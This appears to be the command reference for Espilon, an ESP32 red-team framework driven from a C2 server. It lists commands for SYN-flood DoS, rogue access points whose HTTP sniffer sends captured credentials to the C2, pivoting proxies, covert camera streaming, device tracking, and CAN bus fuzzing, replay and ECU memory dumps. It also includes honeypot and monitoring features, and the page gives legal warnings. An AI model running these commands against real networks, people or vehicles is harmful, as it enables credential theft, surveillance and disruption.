Command Reference

Complete reference for all Espilon commands organized by module.

Interactive Help

Type help in the C3PO console to see available commands for connected devices.


System Commands

Core system commands available on all devices.

system_info

Get detailed device information including chip, cores, flash type, memory, uptime, and loaded modules.

Usage:

c2:> send <device_id> system_info

Response:

chip=esp32s3 cores=2 flash=external heap=245760 uptime=3600s modules=network,fakeap,camera

Fields:

Field | Description
chip | Target chip (esp32, esp32s3, etc.)
cores | Number of CPU cores
flash | Flash type (embedded/external)
heap | Free heap memory (bytes)
uptime | Device uptime in seconds
modules | Comma-separated list of enabled modules

system_info Left: ESP32 serial output | Right: C2 TUI response


system_mem

Get real-time memory statistics.

Usage:

c2:> send <device_id> system_mem

Response:

heap_free=245760 heap_min=180000 internal_free=120000

Fields:

Field | Description
heap_free | Current free heap (bytes)
heap_min | Minimum free heap since boot
internal_free | Internal SRAM available

system_mem Left: ESP32 serial output | Right: C2 TUI response


system_uptime

Get formatted device uptime.

Usage:

c2:> send <device_id> system_uptime

Response:

uptime=86523 days=1 h=00 m=02 s=03

system_uptime Left: ESP32 serial output | Right: C2 TUI response


system_reboot

Reboot the device.

Usage:

c2:> send <device_id> system_reboot

Connection Lost

Device will disconnect and reconnect after ~30 seconds.

system_reboot Left: ESP32 serial output | Right: C2 TUI response


Network Commands

Network reconnaissance and attack capabilities.

Configuration Required

Enable in menuconfig: Component config → Espilon Modules → Network Commands

ping <ip>

ICMP ping to check host availability.

Parameters:

Parameter | Description
ip | Target IP address

Usage:

c2:> send <device_id> ping 192.168.1.1

Response:

ping 192.168.1.1 ok rtt=12ms

ping Left: ESP32 serial output | Right: C2 TUI response


arp_scan

Scan local network via ARP requests.

Usage:

c2:> send <device_id> arp_scan

Response:

arp_scan network=192.168.1.0/24 hosts_found=12 scan_time=8.2s

Use Cases:

  • Network discovery
  • Active host enumeration
  • Device inventory

arp_scan Left: ESP32 serial output | Right: C2 TUI response


proxy_start <local_port> <remote_ip> <remote_port>

Start a TCP proxy tunnel.

Parameters:

Parameter | Description
local_port | Local listening port
remote_ip | Remote target IP
remote_port | Remote target port

Usage:

c2:> send <device_id> proxy_start 8080 10.0.0.50 80

Use Cases:

  • Pivot through compromised network
  • Bypass firewall rules
  • Network redirection

proxy_start Left: ESP32 serial output | Right: C2 TUI response


proxy_stop

Stop the running TCP proxy.

Usage:

c2:> send <device_id> proxy_stop


dos_tcp <ip> <port>

TCP DoS attack (SYN flood).

Parameters:

Parameter | Description
ip | Target IP address
port | Target port

Usage:

c2:> send <device_id> dos_tcp 192.168.1.100 80

Legal Warning

DoS attacks are illegal without explicit authorization. Use only in authorized testing environments.

dos_tcp Left: ESP32 serial output | Right: C2 TUI response


FakeAP Commands

Rogue access point and captive portal attacks.

Legal Warning

Creating rogue access points may be illegal. Only use in authorized testing environments.

Configuration Required

Enable in menuconfig: Component config → Espilon Modules → Fake Access Point

fakeap_start <ssid>

Start rogue access point with captive portal.

Parameters:

Parameter | Description
ssid | Network name to broadcast

Usage:

c2:> send <device_id> fakeap_start FreeWiFi

Response:

fakeap started ssid=FreeWiFi channel=6 ip=192.168.4.1

fakeap_start Left: ESP32 serial output | Right: C2 TUI response


fakeap_stop

Stop rogue access point.

Usage:

c2:> send <device_id> fakeap_stop


fakeap_status

Get current FakeAP status.

Usage:

c2:> send <device_id> fakeap_status

Response:

fakeap status=running ssid=FreeWiFi clients=3 uptime=1234s

fakeap_status Left: ESP32 serial output | Right: C2 TUI response


fakeap_clients

List connected clients.

Usage:

c2:> send <device_id> fakeap_clients

Response:

clients_count=3
client mac=aa:bb:cc:dd:ee:ff ip=192.168.4.2
client mac=11:22:33:44:55:66 ip=192.168.4.3

fakeap_clients Left: ESP32 serial output | Right: C2 TUI response


fakeap_portal <type>

Set captive portal type.

Parameters:

Parameter | Description
type | Portal type (login, survey, update, etc.)

Usage:

c2:> send <device_id> fakeap_portal login


fakeap_sniffer <start|stop>

Start/stop HTTP traffic sniffer on FakeAP.

Usage:

c2:> send <device_id> fakeap_sniffer start
c2:> send <device_id> fakeap_sniffer stop

Captured credentials will be logged and sent to C2.

fakeap_sniffer Left: ESP32 serial output | Right: C2 TUI response


Recon Commands - Camera

ESP32-CAM UDP streaming module.

Hardware Required

Requires ESP32-CAM board with OV2640 camera module.

Configuration Required

Enable in menuconfig: Component config → Espilon Modules → Recon → Camera Mode

cam_start <ip> <port>

Start UDP camera streaming to C2 server.

Parameters:

Parameter | Description
ip | C2 server IP address
port | UDP port for stream (default: 5000)

Usage:

c2:> send <device_id> cam_start 192.168.1.50 5000

Response:

stream started target=192.168.1.50:5000

Stream Protocol:

  1. TOKEN + "START" - Frame start marker
  2. TOKEN + <jpeg_chunk> - JPEG data chunks (max 2034 bytes)
  3. TOKEN + "END" - Frame end marker
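
For an analyst reconstructing what a captured stream carried, for example from a packet capture taken during an authorized test, the framing above can be reassembled as follows. This is an added example, not Espilon or C3PO code; the `TOKEN` value, the function name and the sample datagrams are constructed, since the page does not state the token's content or length.

```python
# Added example (not Espilon/C3PO code): rebuild JPEG frames from the
# START / chunk / END framing described above.
MAX_CHUNK = 2034          # maximum JPEG chunk size given on this page
TOKEN = b"TOK1"           # constructed placeholder; the real token is not on the page

def reassemble(datagrams, token=TOKEN):
    """Return (frames, anomalies) for UDP payloads in arrival order."""
    frames, anomalies = [], []
    buf = None                                  # None means "not inside a frame"
    for i, payload in enumerate(datagrams):
        if not payload.startswith(token):
            anomalies.append(f"{i}: token mismatch")
            continue
        body = payload[len(token):]
        if body == b"START":
            if buf is not None:                 # the END datagram was lost
                anomalies.append(f"{i}: frame restarted before END")
            buf = bytearray()
        elif body == b"END":
            if buf is None:
                anomalies.append(f"{i}: END without START")
            elif buf[:2] == b"\xff\xd8" and buf[-2:] == b"\xff\xd9":
                frames.append(bytes(buf))       # JPEG SOI and EOI markers present
            else:
                anomalies.append(f"{i}: incomplete JPEG discarded")
            buf = None
        elif buf is None:
            anomalies.append(f"{i}: chunk outside a frame")
        elif len(body) > MAX_CHUNK:
            anomalies.append(f"{i}: oversized chunk, frame discarded")
            buf = None
        else:
            buf += body
    # No sequence number appears in the framing above, so a chunk lost in the
    # middle of a frame cannot be detected here; only a lost first or last one.
    return frames, anomalies

# Constructed sample capture: one good frame, a foreign datagram, a frame whose
# END was lost, a second good frame, and a stray END.
SAMPLE = [
    TOKEN + b"START", TOKEN + b"\xff\xd8AAAA", TOKEN + b"BBBB\xff\xd9", TOKEN + b"END",
    b"XXXXSTART",
    TOKEN + b"START", TOKEN + b"\xff\xd8CC",
    TOKEN + b"START", TOKEN + b"\xff\xd8DD\xff\xd9", TOKEN + b"END",
    TOKEN + b"END",
]

if __name__ == "__main__":
    print(reassemble(SAMPLE))
```
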

Performance:

  • Resolution: QQVGA (160x120)
  • Frame rate: ~7 FPS
  • Quality: JPEG 20

cam_start Left: ESP32 serial output | Right: C2 Web Dashboard with live feed


cam_stop

Stop camera streaming.

Usage:

c2:> send <device_id> cam_stop

Response:

stream stopped

cam_stop Left: ESP32 serial output | Right: C2 TUI response


Recon Commands - MLAT

Multilateration (MLAT) for device positioning using RSSI triangulation.

Configuration Required

Enable in menuconfig: Component config → Espilon Modules → Recon → MLAT Mode

mlat_config <ip> <port>

Configure MLAT server endpoint.

Parameters:

Parameter | Description
ip | C2 server IP address
port | UDP port for MLAT data

Usage:

c2:> send <device_id> mlat_config 192.168.1.50 5001

Response:

mlat configured server=192.168.1.50:5001

mlat_config Left: ESP32 serial output | Right: C2 TUI response


mlat_mode <passive|active>

Set MLAT scanning mode.

Parameters:

Parameter | Description
mode | passive = listen only, active = send probes

Usage:

c2:> send <device_id> mlat_mode passive

Modes:

Mode | Description
passive | Listen for probe requests and beacons
active | Send probe requests to detect devices

mlat_mode Left: ESP32 serial output | Right: C2 TUI response


mlat_start

Start MLAT scanning on current channel.

Usage:

c2:> send <device_id> mlat_start

Response:

mlat started channel=6 mode=passive

Data Sent to C2:

rssi mac=aa:bb:cc:dd:ee:ff rssi=-45 channel=6 timestamp=1234567890

mlat_start Left: ESP32 serial output | Right: C2 Web Dashboard with positioning map


mlat_stop

Stop MLAT scanning.

Usage:

c2:> send <device_id> mlat_stop


mlat_status

Get current MLAT status.

Usage:

c2:> send <device_id> mlat_status

Response:

mlat status=running mode=passive channel=6 packets=1234

mlat_status Left: ESP32 serial output | Right: C2 TUI response


Red Team Commands

Autonomous WiFi hunting and ESP-NOW mesh relay.

Configuration Required

Enable in menuconfig: Modules → Red Team Module (CONFIG_MODULE_REDTEAM)

rt_hunt

Start autonomous network hunting cycle. Scans for WiFi, attempts known credentials, re-establishes C2. Async.

Usage:

c2:> send <device_id> rt_hunt [profile]

rt_stop

Stop hunt, restore original WiFi/MAC/TX power.

Usage:

c2:> send <device_id> rt_stop

rt_status

Current hunt state, MAC address, method, and config.

Usage:

c2:> send <device_id> rt_status

Response:

state=hunting mac=AA:BB:CC:DD:EE:FF method=passive networks_known=3 mesh=off

rt_scan

One-shot passive WiFi scan. Reports SSIDs, BSSIDs, channels, RSSI. Async.

Usage:

c2:> send <device_id> rt_scan

rt_net_add

Add a known network to the hunt database (NVS persistent).

Usage:

c2:> send <device_id> rt_net_add <ssid> [password]

rt_net_list

List all known networks in the database.

Usage:

c2:> send <device_id> rt_net_list

rt_mesh

Start or stop ESP-NOW mesh relay for multi-hop C2 connectivity.

Usage:

c2:> send <device_id> rt_mesh <start|stop>


Honeypot Commands

Fake TCP services and network monitoring.

Configuration Required

Enable in menuconfig: Modules → Honeypot Module (CONFIG_MODULE_HONEYPOT)

hp_svc

Control honeypot services (SSH, Telnet, HTTP, FTP).

Usage:

c2:> send <device_id> hp_svc <service> <start|stop|status>

Services: ssh, telnet, http, ftp

hp_wifi

Start/stop WiFi monitoring (rogue AP detection, deauth detection).

Usage:

c2:> send <device_id> hp_wifi <start|stop>

hp_net

Start/stop network monitoring (ARP spoofing, port scan detection).

Usage:

c2:> send <device_id> hp_net <start|stop>

hp_config_set

Set a honeypot configuration value (banner or threshold).

Usage:

c2:> send <device_id> hp_config_set <type> <key> <value>

Examples:

c2:> send esp001 hp_config_set banner ssh "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3"
c2:> send esp001 hp_config_set threshold scan_rate 10

hp_config_get

Get a specific config value.

Usage:

c2:> send <device_id> hp_config_get <type> <key>

hp_config_list

List all config values.

Usage:

c2:> send <device_id> hp_config_list [type]

hp_config_reset

Reset all config to defaults.

Usage:

c2:> send <device_id> hp_config_reset

hp_status

Overall honeypot status: services, monitors, event counts.

Usage:

c2:> send <device_id> hp_status

Response:

services: ssh=running telnet=stopped http=running ftp=stopped
wifi_monitor=on net_monitor=on
events: ssh_attempts=42 http_requests=15 arp_alerts=3
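
A monitoring script can parse this reply and compare successive polls to notice a stopped service, a disabled monitor or a jump in an event counter. The following is an added example, not Espilon or C3PO code; the function names, the second poll and the `LIMITS` thresholds are assumptions made for illustration.

```python
def parse_hp_status(text):
    """Added example, not C3PO code: split an hp_status reply into sections."""
    out = {"services": {}, "monitors": {}, "events": {}}
    for line in text.strip().splitlines():
        head, sep, rest = line.partition(":")
        if sep and "=" not in head:             # "services: ..." / "events: ..."
            section, fields = head.strip(), rest
        else:                                   # bare key=value line (monitor flags)
            section, fields = "monitors", line
        for token in fields.split():
            key, eq, value = token.partition("=")
            if not eq:
                continue                        # not a key=value token
            if section == "events":
                if not value.isdigit():
                    continue                    # counters must be non-negative integers
                value = int(value)
            out.setdefault(section, {})[key] = value
    return out

def review(prev, cur, max_delta):
    """List changes between two parsed polls that deserve a look."""
    findings = []
    for name, state in cur["monitors"].items():
        if state != "on":
            findings.append(f"{name} is {state}")
    for svc, state in cur["services"].items():
        if prev["services"].get(svc) == "running" and state != "running":
            findings.append(f"{svc} went from running to {state}")
    for counter, value in cur["events"].items():
        delta = value - prev["events"].get(counter, 0)
        limit = max_delta.get(counter)          # per-poll threshold, if one is set
        if delta < 0:
            findings.append(f"{counter} decreased by {-delta}")
        elif limit is not None and delta > limit:
            findings.append(f"{counter} rose by {delta} (limit {limit})")
    return findings

# First poll is the response shown on this page; the second is constructed.
POLL_1 = """services: ssh=running telnet=stopped http=running ftp=stopped
wifi_monitor=on net_monitor=on
events: ssh_attempts=42 http_requests=15 arp_alerts=3"""
POLL_2 = """services: ssh=running telnet=stopped http=stopped ftp=stopped
wifi_monitor=on net_monitor=off
events: ssh_attempts=97 http_requests=16 arp_alerts=3"""
LIMITS = {"ssh_attempts": 20, "http_requests": 50}   # hypothetical thresholds

if __name__ == "__main__":
    print(review(parse_hp_status(POLL_1), parse_hp_status(POLL_2), LIMITS))
```
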


CAN Bus Commands

Automotive CAN bus operations via MCP2515 SPI controller.

Configuration Required

Enable in menuconfig: Modules → CAN Bus Module (MCP2515) (CONFIG_MODULE_CANBUS)

Core

Command | Usage | Async | Description
can_start | can_start [bitrate] [mode] | No | Init MCP2515 (mode: normal/listen/loopback)
can_stop | can_stop | No | Stop CAN bus
can_send | can_send <id_hex> <data_hex> | No | Send single frame
can_filter_add | can_filter_add <id_hex> | No | Add software filter
can_filter_del | can_filter_del <id_hex> | No | Remove filter
can_filter_list | can_filter_list | No | List active filters
can_filter_clear | can_filter_clear | No | Clear all filters
can_status | can_status | No | Bus state and error counters
can_sniff | can_sniff [duration_s] | Yes | Stream frames to C2
can_record | can_record [duration_s] | Yes | Record to ring buffer
can_dump | can_dump | Yes | Send buffer to C2
can_replay | can_replay [speed_pct] | Yes | Replay buffer on bus

UDS Diagnostics (requires CONFIG_CANBUS_UDS)

Command | Usage | Description
can_scan_ecu | can_scan_ecu | Discover ECUs (0x7E0-0x7EF)
can_uds | can_uds <tx_id> <svc_hex> [data] | Raw UDS request
can_uds_session | can_uds_session <tx_id> <type> | DiagnosticSessionControl
can_uds_read | can_uds_read <tx_id> <did_hex> | ReadDataByIdentifier
can_uds_dump | can_uds_dump <tx_id> <addr> <size> | ReadMemoryByAddress
can_uds_auth | can_uds_auth <tx_id> [level] | SecurityAccess seed

OBD-II (requires CONFIG_CANBUS_OBD)

Command | Usage | Description
can_obd | can_obd <pid_hex> | Query single PID (decoded)
can_obd_vin | can_obd_vin | Read VIN
can_obd_dtc | can_obd_dtc | Read trouble codes
can_obd_supported | can_obd_supported | List supported PIDs
can_obd_monitor | can_obd_monitor <pids> [interval] | Stream PIDs to C2
can_obd_monitor_stop | can_obd_monitor_stop | Stop monitoring

Fuzzing (requires CONFIG_CANBUS_FUZZ)

Command | Usage | Description
can_fuzz_id | can_fuzz_id [start] [end] [delay] | ID scan fuzz
can_fuzz_data | can_fuzz_data <id> [seed] [delay] | Data mutation
can_fuzz_random | can_fuzz_random [delay] [count] | Random fuzz
can_fuzz_stop | can_fuzz_stop | Stop fuzzing

OTA Commands

Over-the-air firmware updates.

Configuration Required

Enable in menuconfig: Modules → OTA Updates (CONFIG_ESPILON_OTA_ENABLED)

ota_update

Download and apply firmware from HTTPS URL. Async.

Usage:

c2:> send <device_id> ota_update <url>

Progress:

OTA: progress 10%
OTA: progress 20%
...
OTA: image validated, rebooting...

ota_status

Show current firmware info.

Usage:

c2:> send <device_id> ota_status

Response:

running=ota_0 boot=ota_0 version=v2.1.0 idf=v5.3.2


C2 Commands

Commands for the C3PO command & control server.

devices

List all connected devices.

Usage:

c2:> devices

Response:

Connected devices (2):
  espilon-demo (192.168.1.100) - uptime: 1h 23m
  espilon-cam1 (192.168.1.101) - uptime: 45m


send <device_id> <command> [args...]

Send command to specific device.

Usage:

c2:> send espilon-demo system_info
c2:> send espilon-cam1 cam_start 192.168.1.50 5000


broadcast <command> [args...]

Send command to all connected devices.

Usage:

c2:> broadcast system_uptime


camera

Start UDP camera receiver.

Usage:

c2:> camera

Starts UDP listener on port 5000 for camera streams.


web

Start web dashboard.

Usage:

c2:> web

Starts Flask web server on port 8080.


record <start|stop>

Control camera recording.

Usage:

c2:> record start
c2:> record stop

Saves stream to streams/recordings/ directory.


help

Show available commands.

Usage:

c2:> help


exit / quit

Exit C3PO.

Usage:

c2:> exit


Best Practices

Command Timing

  • Scanning: Allow 5-10 seconds between large scans
  • Camera: Only one device can stream at a time
  • MLAT: Position multiple devices around target area for accurate triangulation

Error Handling

Commands may fail with these errors:

Error | Meaning | Solution
TIMEOUT | No response from device | Check device connectivity
INVALID_PARAM | Wrong parameters | Check command syntax
NOT_SUPPORTED | Module not enabled | Enable in menuconfig
ALREADY_RUNNING | Service already active | Stop first, then restart

Performance Tips

  1. Memory Management - Monitor heap with system_mem, reboot if low
  2. Network Efficiency - Avoid flooding network with scans
  3. Camera Bandwidth - UDP streaming uses ~50KB/s at 7 FPS
  4. MLAT Accuracy - Use 3+ devices for triangulation, 4+ for better accuracy
